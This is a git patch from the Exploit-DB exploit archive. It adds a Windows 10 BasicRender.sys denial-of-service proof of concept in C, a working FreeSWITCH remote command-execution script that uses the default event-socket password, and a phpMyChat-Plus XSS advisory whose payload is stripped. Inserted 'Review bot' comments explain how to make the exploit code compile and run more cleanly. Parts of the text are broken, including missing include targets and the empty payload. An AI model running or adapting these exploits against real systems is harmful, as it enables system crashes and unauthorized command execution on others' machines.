From e3e102da5b51a44e481eef95f0f0fbd8148c4cdd Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Dec 2019 05:01:57 +0000 Subject: [PATCH] DB: 2019-12-21 4 changes to exploits/shellcodes Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) FreeSWITCH 1.10.1 - Command Execution phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting --- exploits/hardware/webapps/47776.txt | 2 +- exploits/php/webapps/47798.txt | 17 ++++ exploits/windows/dos/47797.c | 115 ++++++++++++++++++++++++++++ exploits/windows/remote/47799.txt | 52 +++++++++++++ files_exploits.csv | 3 + 5 files changed, 188 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/47798.txt create mode 100644 exploits/windows/dos/47797.c create mode 100644 exploits/windows/remote/47799.txt diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt index 2e690c58e..8a3e360d2 100644 --- a/exploits/hardware/webapps/47776.txt +++ b/exploits/hardware/webapps/47776.txt @@ -7,7 +7,7 @@ # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux -# CVE: N/A +# CVE: CVE-2019-19742 Reproduction Steps: 1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] diff --git a/exploits/php/webapps/47798.txt b/exploits/php/webapps/47798.txt new file mode 100644 index 000000000..9aa27638e --- /dev/null +++ b/exploits/php/webapps/47798.txt @@ -0,0 +1,17 @@ +# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting +# Date: 2019-12-19 +# Exploit Author: Chris Inzinga +# Vendor Homepage: http://ciprianmp.com/latest/ +# Download: https://sourceforge.net/projects/phpmychat/ +# Tested On: Linux & Mac +# Version: 1.98 +# CVE: CVE-2019-19908 + +Description: +The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS + +Payload: +"> + +Vulnerable URL: +http://localhost/plus/pass_reset.php?L=english&pmc_username="> \ No newline at end of file 
diff --git a/exploits/windows/dos/47797.c b/exploits/windows/dos/47797.c
new file mode 100644
index 000000000..5acf476d0
--- /dev/null
+++ b/exploits/windows/dos/47797.c
@@ -0,0 +1,115 @@ +# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) +# Date: 2019-12-20 +# Exploit author: vportal +# Vendor homepage: http://www.microsoft.com +# Version: Windows 10 1803 x86 +# Tested on: Windows 10 1803 x86 +# CVE: N/A + +# A Null pointer deference exists in the WARPGPUCMDSYNC function of the +# BasicRender.sys driver. An unprivileged user can trigger the vulnerability +# to crash the system and deny the service to the rest of the users. + +*PoC:* + +#include +#include + +D3DKMT_CREATEDEVICE* device = NULL; +device = new D3DKMT_CREATEDEVICE(); + +D3DKMT_ENUMADAPTERS enumAdapter = { 0 }; +D3DKMTEnumAdapters(&enumAdapter); +device->hAdapter = enumAdapter.Adapters[1].hAdapter; +logger(log_counter, "EnumAdapter"); + +D3DKMTCreateDevice(device); + +D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL; +contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL(); +memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL)); + +contextVirtual->hDevice = device->hDevice; + +char data[0x200] = { 0 }; +memset(data, 0xff, 0x200); + +contextVirtual->PrivateDriverDataSize = 0x200; +contextVirtual->pPrivateDriverData = data; + +contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10; +contextVirtual->Flags.InitialData = 0x000001; +contextVirtual->Flags.NullRendering = 0x0; + +D3DKMT_SUBMITCOMMAND* submitCommand = NULL; +submitCommand = new D3DKMT_SUBMITCOMMAND(); + +submitCommand->BroadcastContext[0] = 0x40000240; + +for (int i = 0; i < 0x10; i++) + submitCommand->WrittenPrimaries[i] = 0x0; + +submitCommand->PresentHistoryToken = 0x100; +submitCommand->Commands = 0x004b39; +submitCommand->CommandLength = 0x00000d; +submitCommand->BroadcastContext[0] = contextVirtual->hContext; +submitCommand->BroadcastContextCount = 0x1; +submitCommand->Flags.PresentRedirected = 0x1; + +submitCommand->PrivateDriverDataSize = 0x130; + +char* PrivateData = NULL; +PrivateData = new char[submitCommand->PrivateDriverDataSize]; +memset(PrivateData, 0x00, 
submitCommand->PrivateDriverDataSize); + +*(DWORD*)(PrivateData + 0x118) = 0x434e5953; +*(DWORD*)(PrivateData + 0x11c) = 0x18; +*(DWORD*)(PrivateData + 0x120) = 0x000110; +*(DWORD*)(PrivateData + 0x124) = 0x000420; +*(DWORD*)(PrivateData + 0x128) = 0x0; +*(DWORD*)(PrivateData + 0x12c) = 0x000428; + +submitCommand->pPrivateDriverData = PrivateData; + +D3DKMTSubmitCommand(submitCommand); + + +-------------------------------------------------------------------------- +*Crash dump*: + +STACK_TEXT: +8afae92c 8fe82cb2 8afae958 fffffffd 0000048c +BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc +8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 +BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a +8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 +BasicRender!WarpKMSubmitCommandVirtual+0x87 +8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 +dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115 +8afaea08 92b19db6 90114c30 8afaea68 b78da008 +dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10 +8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 +dxgmms2!VidSchiSendToExecutionQueue+0x526 +8afaeb90 92b764a9 00000000 945f5a80 00000000 +dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534 +8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 +dxgmms2!VidSchiWorkerThread+0x1a1 +8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a +8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15 + +eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000 +edi=bb26afd8 +eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe +nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 +efl=00010246 +BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc: +8fe8386c c7061060e88f mov dword ptr [esi],offset +BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=???????? +Resetting default scope + +-------------------------------------------------------------------------------- + +The vulnerability has only been tested in Windows 10 x86 1803. 
+CVSS Base Score: 5.5 +Credit: Victor Portal \ No newline at end of file diff --git a/exploits/windows/remote/47799.txt b/exploits/windows/remote/47799.txt new file mode 100644 index 000000000..147045d80 --- /dev/null +++ b/exploits/windows/remote/47799.txt @@ -0,0 +1,52 @@ +# Exploit Title: FreeSWITCH 1.10.1 - Command Execution +# Date: 2019-12-19 +# Exploit Author: 1F98D +# Vendor Homepage: https://freeswitch.com/ +# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi +# Version: 1.10.1 +# Tested on: Windows 10 (x64) +# +# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to +# it after authenticating. By default commands are not accepted from remote hosts. +# +# -- Example -- +# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami +# Authenticated +# Content-Type: api/response +# Content-Length: 20 +# +# nt authority\system +# + +#!/usr/bin/python3 + +from socket import * +import sys + +if len(sys.argv) != 3: + print('Missing arguments') + print('Usage: freeswitch-exploit.py ') + sys.exit(1) + +ADDRESS=sys.argv[1] +CMD=sys.argv[2] +PASSWORD='ClueCon' # default password for FreeSWITCH + +s=socket(AF_INET, SOCK_STREAM) +s.connect((ADDRESS, 8021)) + +response = s.recv(1024) +if b'auth/request' in response: + s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) + response = s.recv(1024) + if b'+OK accepted' in response: + print('Authenticated') + s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) + response = s.recv(8096).decode() + print(response) + else: + print('Authentication failed') + sys.exit(1) +else: + print('Not prompted for authentication, likely not vulnerable') + sys.exit(1) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f816b0941..e48b40e8a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
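Review bot: The new file does not build as committed: the `# Exploit Title:` header block uses `#` where C accepts only preprocessor directives, and the body allocates with `new` and places statements at file scope, so the `.c` extension does not match the contents. Prefixing the header lines with `//` (or wrapping them in `/* … */`) and either renaming the file to `.cpp` or moving the statements into a function would make the listing consistent with its own naming. The `#include` targets are not visible in this rendering, so I cannot tell whether they survived in the committed file. The advisory also records `CVE: N/A` and a CVSS score but no vendor fix or mitigation status; a line such as `# Fix: <status at time of writing — confirm>` would help defenders triage the finding.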
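Review bot: The header never states the two preconditions the script depends on, although both appear in the body: the listener must accept remote connections, which the file itself says is not the default, and the event-socket password must still be the default given on the `PASSWORD='ClueCon'` line. Recording that explicitly — e.g. `# Note: requires the event socket to accept remote connections (non-default) and the default password 'ClueCon' to be unchanged` — lets readers classify this as an exposed-default-configuration issue rather than a flaw specific to 1.10.1, and points directly at the mitigation. Stylistically, `from socket import *` pulls the whole module namespace into the script and the socket `s` is never closed; `import socket` with `socket.socket(...)` and a `with` block (or an explicit `s.close()`) would be cleaner. Indentation of the nested blocks is not recoverable from this rendering, so I have not commented on it.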
@@ -6625,6 +6625,7 @@ id,file,description,date,author,type,platform,port
 47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
+47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17868,6 +17869,7 @@ id,file,description,date,author,type,platform,port
 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
 47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
 47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
+47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42103,3 +42105,4 @@ id,file,description,date,author,type,platform,port
 47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
 47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
+47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,